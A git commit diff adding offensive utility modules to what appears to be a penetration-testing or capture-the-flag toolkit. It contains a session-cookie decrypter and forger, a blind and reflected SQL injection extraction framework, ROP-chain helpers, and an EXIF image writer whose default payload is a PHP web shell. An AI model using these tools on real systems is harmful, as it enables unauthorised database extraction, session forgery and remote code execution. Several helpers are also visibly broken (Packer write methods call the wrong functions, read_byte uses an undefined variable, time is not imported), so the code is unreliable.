Repository restructuring

This commit is contained in:
2026-04-30 19:53:18 +02:00
parent 31af1f4423
commit f233fe8264
98 changed files with 4216 additions and 1392 deletions

0
utils/__init__.py Normal file
View File

148
utils/crypto_cookie.py Normal file
View File

@@ -0,0 +1,148 @@
import base64
import hashlib
import hmac
import json
import os
import re
import urllib.parse
from Crypto.Cipher import AES
def unpad(data):
if not data:
return data
last_byte = data[-1]
if last_byte < AES.block_size:
data = data[0:-last_byte]
return data
def pad(data):
if not data:
return data
padding = AES.block_size - (len(data) % AES.block_size)
if padding < AES.block_size:
data = data + bytes([padding]) * padding
return data
def generate_mac(APP_KEY, iv, data):
return hmac.new(key=APP_KEY, msg=base64.b64encode(iv)+base64.b64encode(data), digestmod=hashlib.sha256)
def decrypt_cookie(APP_KEY, cookie):
json_obj = json.loads(base64.b64decode(urllib.parse.unquote(cookie)).decode())
iv = base64.b64decode(json_obj["iv"].encode())
encrypted = base64.b64decode(json_obj["value"].encode())
mac = generate_mac(APP_KEY, iv, encrypted)
if mac.hexdigest() != json_obj["mac"]:
print("[~] WARN: macs are not equal")
cipher = AES.new(APP_KEY, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(encrypted)).decode()
def create_cookie(APP_KEY, data):
iv = os.urandom(AES.block_size)
cipher = AES.new(APP_KEY, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(pad(json.dumps(data).encode()))
mac = generate_mac(APP_KEY, iv, encrypted)
json_obj = {
"iv": base64.b64encode(iv).decode(),
"value": base64.b64encode(encrypted).decode(),
"mac": mac.hexdigest()
}
new_cookie = base64.b64encode(json.dumps(json_obj).encode()).decode()
# new_cookie = urllib.parse.quote(new_cookie)
return new_cookie
def hkdf_extract(salt, input_key_material, hash_name='sha256'):
"""
Extract a pseudorandom key from the input key material and salt using HMAC.
:param salt: The salt (bytes).
:param input_key_material: The input key material (bytes).
:param hash_name: The hash function to use (string).
:return: The pseudorandom key (bytes).
"""
if salt is None or len(salt) == 0:
salt = b'\x00' * hashlib.new(hash_name).digest_size
return hmac.new(salt, input_key_material, hash_name).digest()
def hkdf_expand(pseudorandom_key, info=b'', length=32, hash_name='sha256'):
"""
Expand the pseudorandom key into one or more keys using HMAC.
:param pseudorandom_key: The pseudorandom key (bytes).
:param info: Optional context and application-specific information (bytes).
:param length: The length of the output key material in bytes (int).
:param hash_name: The hash function to use (string).
:return: The output key material (bytes).
"""
hash_len = hashlib.new(hash_name).digest_size
blocks_needed = (length + hash_len - 1) // hash_len
okm = b''
output_block = b''
for counter in range(blocks_needed):
output_block = hmac.new(pseudorandom_key, output_block + info + bytes([counter + 1]), hash_name).digest()
okm += output_block
return okm[:length]
def hkdf(input_key_material, salt, info=b'', length=32, hash_name='sha256'):
"""
Derive keys using HKDF (extract and expand stages).
:param input_key_material: The input key material (bytes).
:param salt: The salt (bytes).
:param info: Optional context and application-specific information (bytes).
:param length: The length of the output key material in bytes (int).
:param hash_name: The hash function to use (string).
:return: The derived key (bytes).
"""
pseudorandom_key = hkdf_extract(salt, input_key_material, hash_name)
return hkdf_expand(pseudorandom_key, info, length, hash_name)
def decrypt_cookie_prestashop(COOKIE_KEY, cookie):
assert re.match(r"^[a-fA-F0-9]+$", COOKIE_KEY)
assert re.match(r"^[a-fA-F0-9]+$", cookie)
# https://github.com/defuse/php-encryption/blob/master/src/Key.php
KEY_CURRENT_VERSION = b"\xDE\xF0\x00\x00"
HEADER_SIZE = len(KEY_CURRENT_VERSION)
KEY_BYTE_SIZE = 32
CHECKSUM_BYTE_SIZE = 32
COOKIE_KEY = bytearray.fromhex(COOKIE_KEY)
assert COOKIE_KEY.startswith(KEY_CURRENT_VERSION)
assert len(COOKIE_KEY) == HEADER_SIZE + KEY_BYTE_SIZE + CHECKSUM_BYTE_SIZE
real_cookie_key = COOKIE_KEY[HEADER_SIZE:HEADER_SIZE+KEY_BYTE_SIZE]
cookie_signature_check = COOKIE_KEY[0:HEADER_SIZE+KEY_BYTE_SIZE]
key_signature = COOKIE_KEY[HEADER_SIZE+KEY_BYTE_SIZE:]
assert hashlib.sha256(cookie_signature_check).digest() == key_signature
# https://github.com/defuse/php-encryption/blob/master/src/Core.php
CURRENT_VERSION = b"\xDE\xF5\x02\x00"
HEADER_SIZE = len(CURRENT_VERSION)
SALT_SIZE = 32
IV_SIZE = 16
HMAC_SIZE = 32
cookie = bytearray.fromhex(cookie)
assert cookie.startswith(CURRENT_VERSION)
assert len(cookie) >= HEADER_SIZE + SALT_SIZE + IV_SIZE + HMAC_SIZE
salt = cookie[HEADER_SIZE:HEADER_SIZE+SALT_SIZE]
iv = cookie[HEADER_SIZE+SALT_SIZE:HEADER_SIZE+SALT_SIZE+IV_SIZE]
ct = cookie[HEADER_SIZE+SALT_SIZE+IV_SIZE:-HMAC_SIZE]
hmac_data = cookie[-HMAC_SIZE:]
PBKDF2_ITERATIONS = 100000
ENCRYPTION_INFO_STRING = b'DefusePHP|V2|KeyForEncryption'
AUTHENTICATION_INFO_STRING = b'DefusePHP|V2|KeyForAuthentication'
derived_key = hkdf(real_cookie_key, salt, ENCRYPTION_INFO_STRING, 32, "sha256")
cipher = AES.new(derived_key, AES.MODE_CTR, initial_value=iv, nonce=b"")
plaintext = cipher.decrypt(ct).decode()
# TODO: check hmac_data
lines = plaintext.split("¤")
return dict(map(lambda line: line.split("|"), lines))

133
utils/packeter.py Normal file
View File

@@ -0,0 +1,133 @@
import struct
class StructWrapper:
@staticmethod
def _endian(e):
return ">" if e else "<"
@staticmethod
def _format_size(f):
format_sizes = {
"c": 1,
"h": 2, "H": 2,
"i": 4, "I": 4,
"q": 8, "Q": 8,
}
assert f in format_sizes
return format_sizes[f]
class Parser(StructWrapper):
def __init__(self, data, big_endian=False):
self.data = data
self.offset = 0
self.big_endian = big_endian
def eof(self):
return self.offset >= len(self.data)
def remaining_size(self):
return len(self.data[self.offset:])
def _struct_unpack(self, big_endian, f):
size = self._format_size(f)
assert self.remaining_size() >= size
# grab default endianess, when none is given
if big_endian is None:
big_endian = self.big_endian
value = struct.unpack(self._endian(big_endian) + f, self.data[self.offset:self.offset+size])[0]
self.offset += size
return value
def read_byte(self):
return self._struct_unpack(big_endian, "c")
def read_char(self):
return chr(self.read_byte())
def read_signed_short(self, big_endian=None):
return self._struct_unpack(big_endian, "h")
def read_unsigned_short(self, big_endian=None):
return self._struct_unpack(big_endian, "H")
def read_signed_int(self, big_endian=None):
return self._struct_unpack(big_endian, "i")
def read_unsigned_int(self, big_endian=None):
return self._struct_unpack(big_endian, "I")
def read_signed_long(self, big_endian=None):
return self._struct_unpack(big_endian, "q")
def read_unsigned_long(self, big_endian=None):
return self._struct_unpack(big_endian, "Q")
def read_bin(self, length):
d = self.data[self.offset:self.offset+length]
assert len(self.data[self.offset:]) >= length
self.offset += length
return d
def read_until(self, byte):
data = b""
while not self.eof():
c = self.read_byte()
if c == byte:
break
data += c
return data
class Packer(StructWrapper):
def __init__(self, big_endian=False):
self.buffer = b""
self.offset = 0
self.big_endian = big_endian
def get(self):
return self.buffer
def length(self):
return len(self.buffer)
def _struct_pack(self, big_endian, f, value):
# grab default endianess, when none is given
if big_endian is None:
big_endian = self.big_endian
size = self._format_size(f)
self.buffer += struct.pack(self._endian(big_endian) + f, value)
self.offset += size
def write_byte(self, value):
self._struct_pack(big_endian, "c", value)
def write_char(self, value):
self._struct_pack(big_endian, "c", value.encode())
def write_signed_short(self, value, big_endian=None):
self._struct_pack(big_endian, "c", value)
def write_unsigned_short(self, value, big_endian=None):
self._struct_pack(big_endian, "H", value)
def write_signed_int(self, value, big_endian=None):
self._struct_unpack(big_endian, "i", value)
def write_unsigned_int(self, value, big_endian=None):
self._struct_unpack(big_endian, "I", value)
def write_signed_long(self, value, big_endian=None):
self._struct_unpack(big_endian, "q", value)
def rwrite_unsigned_long(self, value, big_endian=None):
self._struct_unpack(big_endian, "Q", value)
def write_bin(self, value):
self.buffer += value
self.offset += len(value)
def write_string(self, value, encoding="UTF-8"):
self.write_bin(value.encode(encoding))

355
utils/sqli.py Normal file
View File

@@ -0,0 +1,355 @@
from abc import ABC, abstractmethod
import sys
import string
class SQLi(ABC):
@staticmethod
def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
query = "SELECT "
query += column if isinstance(column, str) else ",".join(column)
query += "" if not table else f" FROM {table}"
query += "" if not condition else f" WHERE {condition}"
query += "" if limit is None else f" LIMIT {limit}"
query += "" if offset is None or limit is None else f" OFFSET {offset}"
return query
def extract_multiple_ints(self, column: str, table=None, condition=None, limit=None, verbose=False):
row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
for i in range(0, row_count):
rows.append(self.extract_int(column, table, condition, i, verbose=verbose))
return rows
def extract_multiple_strings(self, column: str, table=None, condition=None, limit=None, verbose=False):
row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
for i in range(0, row_count):
rows.append(self.extract_string(column, table, condition, i, verbose=verbose))
return rows
def substring(self, what, offset: int, size: int):
return f"substr({what},{offset},{size})"
def ascii(self, what):
return f"ascii({what})"
@abstractmethod
def extract_int(self, column: str, table=None, condition=None,
offset=None, verbose=False):
pass
@abstractmethod
def extract_string(self, column: str, table=None, condition=None, offset=None, verbose=False):
pass
@abstractmethod
def get_database_version(self, verbose=False):
pass
@abstractmethod
def get_current_user(self, verbose=False):
pass
@abstractmethod
def get_current_database(self, verbose=False):
pass
@abstractmethod
def get_table_names(self, schema: str, verbose=False):
pass
@abstractmethod
def get_column_names(self, table: str, schema: str, verbose=False):
pass
class ReflectedSQLi(SQLi, ABC):
def __init__(self, column_types: list):
self.column_types = column_types
self.placeholder_fn = lambda c: f"'{c}'"
@abstractmethod
def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
pass
def extract_int(self, column: str, table=None, condition=None, offset=None, verbose=False):
if str in self.column_types:
return int(self.extract_string(column, table, condition, offset))
elif int not in self.column_types:
print("[!] Reflectd SQL does neither reflect string nor int types, only:", self.column_types)
return None
int_column = self.column_types.index(int)
query_columns = list(map(self.placeholder_fn, range(len(self.column_types))))
query_columns[int_column] = column
return int(self.reflected_sqli(query_columns, table, condition, offset)[int_column])
def extract_string(self, column: list|str, table=None, condition=None, offset=None, verbose=False):
if str not in self.column_types:
if isinstance(column, str) and int in self.column_types:
print("[!] Reflectd SQL does not reflect string types, querying char-by-char")
str_length = self.extract_int(f"LENGTH({column})", table=table, condition=condition, offset=offset, verbose=verbose)
if verbose:
print(f"Querying {str_length} chars")
result = ""
for i in range(1,str_length+1):
q = self.ascii(self.substring(column, i, 1))
c = chr(self.extract_int(q, table=table, condition=condition, offset=offset, verbose=verbose))
if verbose:
sys.stdout.write(c)
sys.stdout.flush()
result += c
return result
else:
print("[!] Reflectd SQL does not reflect string types, only:", self.column_types)
return None
str_column = self.column_types.index(str)
query_columns = list(map(self.placeholder_fn, range(len(self.column_types))))
query_columns[str_column] = column
return self.reflected_sqli(query_columns, table, condition, offset)[str_column]
def extract_multiple_ints(self, columns: list|str, table=None, condition=None, limit=None, verbose=False):
one = False
if isinstance(columns, str):
columns = [columns]
one = True
column_count = len(columns)
if len(self.column_types) < column_count:
print(f"[!] Reflectd SQL does not reflect required amount of columns. required={column_count}, got={len(self.column_types)}")
return None
query_columns = columns + list(map(str, range(column_count + 1, len(self.column_types) + 1)))
row_count = self.extract_int(f"COUNT(*)", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
column_str = ",".join(query_columns)
for i in range(0, row_count):
row = self.reflected_sqli(query_columns, table, condition, i, verbose=verbose)
if one:
rows.append(int(row[0]))
else:
rows.append(list(map(lambda i: int(row[i]), range(column_count))))
return rows
def extract_multiple_strings(self, columns: list|str, table=None, condition=None, limit=None, verbose=False):
one = False
if isinstance(columns, str):
columns = [columns]
one = True
column_count = len(columns)
if self.column_types.count(str) < column_count:
print(f"[!] Reflectd SQL does not reflect required amount of string columns. required={column_count}, got={self.column_types.count(str)}")
return None
query_columns = list(map(str, range(1, len(self.column_types) + 1)))
offsets = list(None for _ in range(column_count))
offset = 0
for i, column in enumerate(columns):
while self.column_types[offset] != str:
offset += 1
offsets[i] = offset
query_columns[offset] = column
offset += 1
column_str = ",".join(query_columns)
# todo: fix count(*) for distinct
row_count = self.extract_int(f"COUNT(*)", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
for i in range(0, row_count):
row = self.reflected_sqli(query_columns, table, condition, i, verbose=verbose)
if one:
rows.append(row[offsets[0]])
else:
rows.append(list(map(lambda o: row[o], offsets)))
return rows
@classmethod
def guess_reflected_columns(cls, callback, verbose=False):
data = None
column_count = 1
while data is None:
if verbose:
print(f"[ ] Trying with {column_count} columns")
query_columns = list(map(lambda c: f"'column-{c}-sqli'", range(column_count)))
query_str = cls.build_query(query_columns)
data = callback(query_str) # should return some kind of text for a given query
if not data:
column_count += 1
continue
reflected_columns = []
for c in range(column_count):
column_name = f"column-{c}-sqli"
reflected_columns.append(str if column_name in data else None) # how to guess the type (str/int)?
return reflected_columns
# todo: extract_multiple with columns as dict (name -> type), e.g. extract_multiple({"id": int, "name": str})
class BlindSQLi(SQLi, ABC):
@abstractmethod
def blind_sqli(self, condition: str, verbose=False) -> bool:
pass
def extract_int(self, column: str, table=None, condition=None,
offset=None, verbose=False, binary_search=True,
min_value=None, max_value=None):
query = self.build_query(column, table, condition, offset)
if self.blind_sqli(f"({query})=0"):
return 0
if not binary_search:
cur_int = 1 if min_value is None else min_value
while self.blind_sqli(f"({query})>{cur_int}", verbose):
cur_int += 1
if max_value is not None and cur_int >= max_value:
return None
return cur_int
else:
if min_value is None or max_value is None:
min_value = 1 if min_value is None else min_value
max_value = 1 if max_value is None else max_value
while self.blind_sqli(f"({query})>{max_value}", verbose):
min_value = max_value + 1
max_value = max_value * 2
while True:
cur_int = (min_value + max_value) // 2
if self.blind_sqli(f"({query})>{cur_int}", verbose):
min_value = cur_int + 1
elif self.blind_sqli(f"({query})<{cur_int}", verbose):
max_value = cur_int - 1
else:
return cur_int
def extract_string(self, column: str, table=None, condition=None, offset=None, verbose=False, max_length=None, charset=string.printable, cur_str=""):
if max_length is None:
max_length = self.extract_int(f"LENGTH({column})", table, condition, offset, verbose=verbose)
if verbose:
print("Fetched length:", max_length)
while True:
found = False
cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
if charset:
query = self.build_query(cur_column, table, condition, offset)
for c in charset:
if self.blind_sqli(f"({query})={ord(c)}"):
found = True
cur_str += c
if verbose:
sys.stdout.write(c)
sys.stdout.flush()
break
else:
c = self.extract_int(cur_column, table, condition, min_value=0, max_value=127)
if c is not None:
found = True
cur_str += chr(c)
if verbose:
sys.stdout.write(chr(c))
sys.stdout.flush()
if not found or (max_length is not None and len(cur_str) >= max_length):
break
if verbose:
print()
return cur_str
class PostgreSQLi(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("VERSION()", verbose=verbose)
def get_current_user(self, verbose=False):
return self.extract_string("current_user", verbose=verbose)
def get_current_database(self, verbose=False):
return self.extract_string("current_database()", verbose=verbose)
def get_table_names(self, schema: str = "public", verbose=False):
return self.extract_multiple_strings("table_name", "information_schema.tables", f"table_schema='{schema}'",
verbose=verbose)
def get_column_names(self, table: str, schema: str = "public", verbose=False):
return self.extract_multiple_strings("column_name", "information_schema.columns",
f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose)
class MySQLi(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("VERSION()", verbose=verbose)
def get_current_user(self, verbose=False):
return self.extract_string("USER()", verbose=verbose)
def get_current_database(self, verbose=False):
return self.extract_string("DATABASE()", verbose=verbose)
def get_table_names(self, schema: str, verbose=False):
return self.extract_multiple_strings("table_name", "information_schema.tables", f"table_schema='{schema}'",
verbose=verbose)
def get_column_names(self, table: str, schema: str, verbose=False):
return self.extract_multiple_strings("column_name", "information_schema.columns",
f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose)
class SQLitei(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("sqlite_version()", verbose=verbose)
def get_current_user(self, verbose=False):
raise Exception("Not implemented!")
def get_current_database(self, verbose=False):
raise Exception("Not implemented!")
def get_table_names(self, verbose=False):
return self.extract_multiple_strings("name", "sqlite_schema", f"type='table'",
verbose=verbose)
def get_column_names(self, table: str, schema: str, verbose=False):
# TODO: we could query the "sql" column and parse it using regex
raise Exception("Not implemented!")
def ascii(self, what):
return f"unicode({what})"

547
utils/util.py Executable file
View File

@@ -0,0 +1,547 @@
#!/usr/bin/env python
import random
import math
import socket
import base64
import itertools
import netifaces as ni
import string
import sys
import os
import io
import re
import json
import urllib.parse
def hex_dump(data, column_size=16):
printables = (string.ascii_letters + string.digits + string.punctuation).encode()
for i in range(0, len(data), column_size):
row = data[i:i+column_size]
as_string = "".join("." if bytes([b]) not in printables else chr(b) for b in row)
as_hex = " ".join("%02x" % b for b in row)
if len(row) < column_size:
as_hex += " " * 3 * (column_size - len(row))
print("%08x" % (i * column_size), "|", as_hex, "|", as_string)
def is_port_in_use(port):
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(('127.0.0.1', port)) == 0
def nvl(a, b):
return b if a is None else a
def get_payload_path(path=""):
return os.path.realpath(os.path.join(os.path.dirname(__file__), path))
def get_address(interface={"tun0", "vpn0"}):
if not isinstance(interface, str):
requested = set(interface)
available = set(ni.interfaces())
interfaces = list(requested.intersection(available))
interface = None if not interfaces else interfaces[0]
# not found or not specified, take the first available, which is not loopback
if not interface in ni.interfaces():
interfaces = ni.interfaces()
for interface in interfaces:
if interface == "lo":
continue
addresses = ni.ifaddresses(interface)
addresses = [addresses[ni.AF_INET][i]["addr"] for i in range(len(addresses[ni.AF_INET]))]
addresses = [addr for addr in addresses if not str(addr).startswith("127")]
if addresses:
return addresses[0]
print("[-] Could not find a network interface card with a valid ipv4")
else:
addresses = ni.ifaddresses(interface)
addresses = [addresses[ni.AF_INET][i]["addr"] for i in range(len(addresses[ni.AF_INET]))]
addresses = [addr for addr in addresses if not str(addr).startswith("127")]
return addresses[0]
def generate_random_string(length=16, charset=string.printable):
chars = random.choices(charset, k=length)
return "".join(chars)
def exit_with_error(res, err):
if callable(err):
print(err(res))
else:
print(err)
exit()
def assert_status_code(res, status_code, err=None):
if type(status_code) == int and res.status_code != status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
exit_with_error(res, err)
elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
exit_with_error(res, err)
def assert_location(res, location, err=None):
assert_header_present(res, "Location")
location_header = res.headers["Location"].lower()
if location_header == location.lower():
return
err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
exit_with_error(res, err)
def assert_content_type(res, content_type, err=None):
assert_header_present(res, "Content-Type")
content_type_header = res.headers["Content-Type"].lower()
if content_type_header == content_type.lower():
return
if content_type_header.lower().startswith(content_type.lower() + ";"):
return
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
exit_with_error(res, err)
def assert_header_present(res, header, err=None):
if header in res.headers:
return
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
exit_with_error(res, err)
def assert_empty(res, err=None):
if not res.content or len(res.content) == 0:
return
err = f"[-] '{res.url}' returned unexpected data" if err is None else err
exit_with_error(res, err)
def assert_not_empty(res, err=None):
if len(res.content) > 0:
return
err = f"[-] '{res.url}' did not return any data" if err is None else err
exit_with_error(res, err)
def assert_content_contains(res, data, err=None):
assert_not_empty(res)
if isinstance(data, str) and data in res.text:
return True
elif data in res.content:
return True
err = f"[-] '{res.url}' did not include '{data}' in response" if err is None else err
exit_with_error(res, err)
def assert_cookie_present(res, cookie_name, err=None):
assert_header_present(res, "Set-Cookie")
if cookie_name in res.cookies:
return True
err = f"[-] '{res.url}' did not set-cookie '{cookie_name}'" if err is None else err
exit_with_error(res, err)
def assert_json_path(res, path, value, err=None):
assert_content_type(res, "application/json")
assert_not_empty(res)
json_data = json.loads(res.text)
for key in filter(None, path.split(".")):
match = re.match(r"\[([0-9]+)\]", key)
if match:
key = int(match[1])
json_data = json_data[key]
if json_data == value:
return
err = f"[-] '{res.url}' value at path '{path}' does not match. got={json_data} expected={value}" if err is None else err
exit_with_error(res, err)
def assert_regex_match(pattern, data, err=None):
if not isinstance(pattern, re.Pattern):
pattern = re.compile(pattern)
match = pattern.match(data)
if match:
return match
err = f"[-] Data does not match pattern '{pattern}': '{data}'" if err is None else err
exit_with_error(None, err)
def open_server(address, ports=None, retry=False):
listen_port = None
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
if isinstance(ports, int):
listen_port = ports
retry = False
elif isinstance(ports, range):
listen_port = random.randint(ports[0], ports[-1])
elif ports is None:
listen_port = random.randint(10000,65535)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((address, listen_port))
sock.listen(1)
return sock
except Exception as e:
if retry:
print("[-] Unable to listen on port %d: %s, Retrying…" % (listen_port, str(e)))
time.sleep(1.0)
else:
raise e
class Stack:
def __init__(self, start_address, word_size=8):
self.buffer = b""
self.word_size = word_size
self.address = start_address
def push_buffer(self, data, reverse=False):
data_length = len(data)
if data_length % self.word_size != 0:
print("[-] Cannot push uneven data to stack, got:", len(data))
exit()
if not reverse:
self.buffer += data
else:
words = [data[i:i+self.word_size] for i in range(0, data_length, self.word_size)]
self.buffer += b"".join(words[::-1])
self.address += data_length
def push_string(self, data):
ptr = self.address
data = pad(data.encode() + b"\x00", self.word_size)
self.buffer += data
self.address += len(data)
return ptr
def pop_word(self):
addr = self.buffer[-self.word_size:]
self.buffer = self.buffer[0:-self.word_size]
self.address -= self.word_size
return addr
def pack_value(self, value):
if self.word_size == 8:
return p64(value)
else:
print("Not implemented: pack_value with word size:", self.word_size)
def unpack_value(self, value):
if self.word_size == 8:
return u64(value)
else:
print("Not implemented: unpack_value with word size:", self.word_size)
def push_word(self, value):
ptr = self.address
if type(value) not in [bytes, bytearray]:
value = self.pack_value(value)
self.buffer += value
self.address += self.word_size
return ptr
def push_array(self, arr):
addresses = []
for arg in arr:
arg_addr = self.push_string(arg)
addresses.append(arg_addr)
addresses.append(0x0)
ptr = self.address
for arg_addr in addresses:
self.push_word(arg_addr)
return ptr
def check_addr(self, addr, verbose=True):
if addr > self.address:
if verbose:
print(f"[ ] Stack overflow: addr={hex(addr)} top={hex(self.address)}")
return False
elif self.address - addr > len(self.buffer):
if verbose:
print(f"[ ] Stack underflow: addr={hex(addr)} top={hex(self.address)} size={hex(len(self.buffer))}")
return False
return True
def read_bytes(self, start_addr, end_addr):
# check bounds
if not self.check_addr(start_addr) or not self.check_addr(end_addr):
return None
elif start_addr > end_addr:
print(f"[-] Invalid bounds start={hex(start_addr)} end={hex(end_addr)}")
return None
start = self.address - start_addr
end = self.address - end_addr
return self.buffer[start:end]
def peek_bytes(self, n):
return self.buffer[-n:]
def peek_word(self, n = 0):
if n == 0:
return self.buffer[-self.word_size * (n + 1):]
else:
return self.buffer[-self.word_size * (n + 1):-self.word_size * n]
def print(self):
for offset in range(0, len(self.buffer) // self.word_size):
hex_bytes = self.peek_word(offset).hex(" ")
addr = self.address - offset * self.word_size
print(f"\t{hex(addr)}\t{hex_bytes}")
def setRegisters(elf, registers):
from pwn import ROP
rop = ROP(elf)
for t in rop.setRegisters(registers):
value = t[0]
gadget = t[1]
if type(gadget) == pwnlib.rop.gadgets.Gadget:
rop.raw(gadget.address)
for reg in gadget.regs:
if reg in registers:
rop.raw(registers[reg])
else:
rop.raw(0)
return rop
def genSyscall(elf, syscall, registers):
registers["rax"] = syscall
rop = setRegisters(elf, registers)
syscall_gadget = "syscall" if elf.arch == "amd64" else "int 0x80"
rop.raw(rop.find_gadget([syscall_gadget]).address)
return rop
def lpad(x, n, b=b"\x00"):
return pad(x, n, b, "l")
def rpad(x, n, b=b"\x00"):
return pad(x, n, b, "r")
def pad(x, n, b=b"\x00", s="r"):
pad_len = len(x) % n
if pad_len != 0:
if s == "r":
x += b * (n - pad_len)
elif s == "l":
x = b * (n - pad_len) + x
return x
def xor(a, b, *args):
if isinstance(a, int):
a = a.to_bytes(math.ceil(math.log(a)/math.log(2)/8.0))
if isinstance(b, int):
b = b.to_bytes(math.ceil(math.log(b)/math.log(2)/8.0))
if len(a) == 0 or len(b) == 0:
return a
if len(a) < len(b):
a *= int(math.ceil((len(b)/len(a))))
a = a[0:len(b)]
elif len(b) < len(a):
b *= int(math.ceil((len(a)/len(b))))
b = b[0:len(a)]
if type(a) == str and type(b) == str:
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
else:
if type(a) not in (bytes, bytearray):
a = a.encode()
if type(b) not in (bytes, bytearray):
b = b.encode()
result = b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
if len(args) > 0:
result = xor(result, *args)
return result
def base64urldecode(data):
if isinstance(data, str):
data = urllib.parse.unquote(data)
data = data.encode()
if len(data) % 4 > 0:
data += b'=' * (4 - len(data) % 4)
return base64.urlsafe_b64decode(data)
def base64urlencode(data, strip_padding=True):
if isinstance(data, str):
data = data.encode()
encoded = base64.urlsafe_b64encode(data)
if strip_padding:
encoded = encoded.rstrip(b"=")
return encoded
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None, _format=None):
import exif
from PIL import Image
if _in is None or (isinstance(_in, str) and not os.path.exists(_in)):
_in = Image.new("RGB", (50,50), (255,255,255))
if isinstance(_in, str):
with open(_in, "rb") as f:
_in = exif.Image(f)
elif isinstance(_in, Image.Image):
bytes = io.BytesIO()
format = _format
if format is None:
format = _in.format
if format is None:
print("Image format not specified, use PNG/JPG/...")
exit()
elif format == "PNG":
print("Image PNG not supported yet :/")
exit()
_in.save(bytes, format=format)
print(bytes)
_in = exif.Image(bytes.getvalue())
elif not isinstance(_in, exif.Image):
print("Invalid input. Either give an Image or a path to an image.")
exit()
valid_tags = list(exif._constants.ATTRIBUTE_NAME_MAP.values())
if exif_tag is None:
_in.image_description = payload
elif exif_tag == "all":
for exif_tag in valid_tags:
try:
print("Setting exif tag:", exif_tag)
_in.set(exif_tag, payload)
except Exception as e:
print("Error setting exif tag:", exif_tag, str(e))
pass
else:
if exif_tag not in valid_tags:
print("Invalid exif-tag. Choose one of the following:")
print(", ".join(valid_tags))
exit()
_in.set(exif_tag, payload)
if _out is None:
return _in.get_file()
elif isinstance(_out, str):
with open(_out, "wb") as f:
f.write(_in.get_file())
elif hasattr(_out, "write"):
_out.write(_in.get_file())
else:
print("Invalid output argument.")
def human_readable_size(value):
index = 0
suffixes = ["B", "KiB", "MiB", "GiB", "TiB"]
while value >= 1024:
if index >= len(suffixes) - 1:
break
value /= 1024.0
index += 1
return "%.2f %s" % (value, suffixes[index])
class CaseInsensitiveDict(dict):
"""Basic case-insensitive dict with strings only keys."""
proxy = {}
def __init__(self, data=None):
super().__init__()
if data:
self.proxy = dict((k.lower(), k) for k in data)
for k in data:
self[k] = data[k]
else:
self.proxy = dict()
def __contains__(self, k):
return k.lower() in self.proxy
def __delitem__(self, k):
key = self.proxy[k.lower()]
super(CaseInsensitiveDict, self).__delitem__(key)
del self.proxy[k.lower()]
def __getitem__(self, k):
key = self.proxy[k.lower()]
return super(CaseInsensitiveDict, self).__getitem__(key)
def get(self, k, default=None):
return self[k] if k in self else default
def __setitem__(self, k, v):
super(CaseInsensitiveDict, self).__setitem__(k, v)
self.proxy[k.lower()] = k
@staticmethod
def build(labels, data):
row = CaseInsensitiveDict()
for key, val in zip(labels, data):
row[key] = val
return row
if __name__ == "__main__":
bin = sys.argv[0]
if len(sys.argv) < 2:
print("Usage: %s [command]" % bin)
exit(1)
command = sys.argv[1]
if command == "getAddress":
if len(sys.argv) >= 3:
print(get_address(sys.argv[2]))
else:
print(get_address())
elif command == "pad":
if len(sys.argv) >= 3:
n = 8
if len(sys.argv) >= 4:
n = int(sys.argv[3])
print(pad(sys.argv[2].encode(), n))
else:
print("Usage: %s pad <str> [n=8]" % bin)
elif command == "exifImage":
if len(sys.argv) < 4:
print("Usage: %s exifImage <file> <payload> [tag]" % bin)
else:
_in = sys.argv[2]
payload = sys.argv[3]
if payload == "-":
payload = sys.stdin.readlines()
tag = None if len(sys.argv) < 5 else sys.argv[4]
_out = _in.split(".")
if len(_out) == 1:
_out = _in + "_exif"
else:
_out = ".".join(_out[0:-1]) + "_exif." + _out[-1]
set_exif_data(payload, _in, _out, tag)
else:
print("Usage: %s [command]" % bin)
print("Available commands:")
print(" help, getAddress, pad, exifImage")